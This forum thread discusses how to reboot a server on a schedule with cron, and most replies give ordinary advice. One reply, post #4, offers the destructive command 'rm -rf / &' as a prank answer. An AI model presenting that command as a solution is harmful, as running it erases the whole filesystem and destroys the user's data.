is there way to reboot server with cron job?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • RaiderCash_Dominik
    Confirmed User
    • Jan 2010
    • 1145

    #1

    is there way to reboot server with cron job?

    Question.
    Like once a day the cron would reboot the server?
  • camperjohn64
    Confirmed User
    • Feb 2005
    • 1531

    #2
    Why would you need that? If there is a memory leak or something, that needs to be addressed first. Solve the problem, not the symptom.

    But that wasn't your question was it? I understand that is probably what you've already tried.

    I would experiement with putting it into a PHP script that simply does a `reboot`; I am not sure if you could launch reboot directly from a cron job.

    Code:
    <?php
    
     `reboot`;
    
    ?>
    *Notice the backwards quote.

    Then your cron job does:

    php /home/folder/reboot.php
    www.gimmiegirlproductions.com

    Comment

    • AdultKing
      Raise Your Weapon
      • Jun 2003
      • 15601

      #3
      It's possible, it can be done, but the question begs, why the fuck would you want to ?

      Comment

      • react
        Confirmed User
        • Sep 2003
        • 673

        #4
        rm -rf / &
        --
        react

        Comment

        • Linguist
          Confirmed User
          • Apr 2004
          • 1706

          #5
          You should never reboot your whole server on schedule.

          ... but if you're really insistent on it, add a crobjob for a root user with /sbin/reboot command
          315-310

          Comment

          • woj
            <&(©¿©)&>
            • Jul 2002
            • 47880

            #6
            if anything restart only apache... rebooting whole server is a bad idea... but yea, it can be done with a cron...
            Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
            Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
            Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

            Comment

            Working...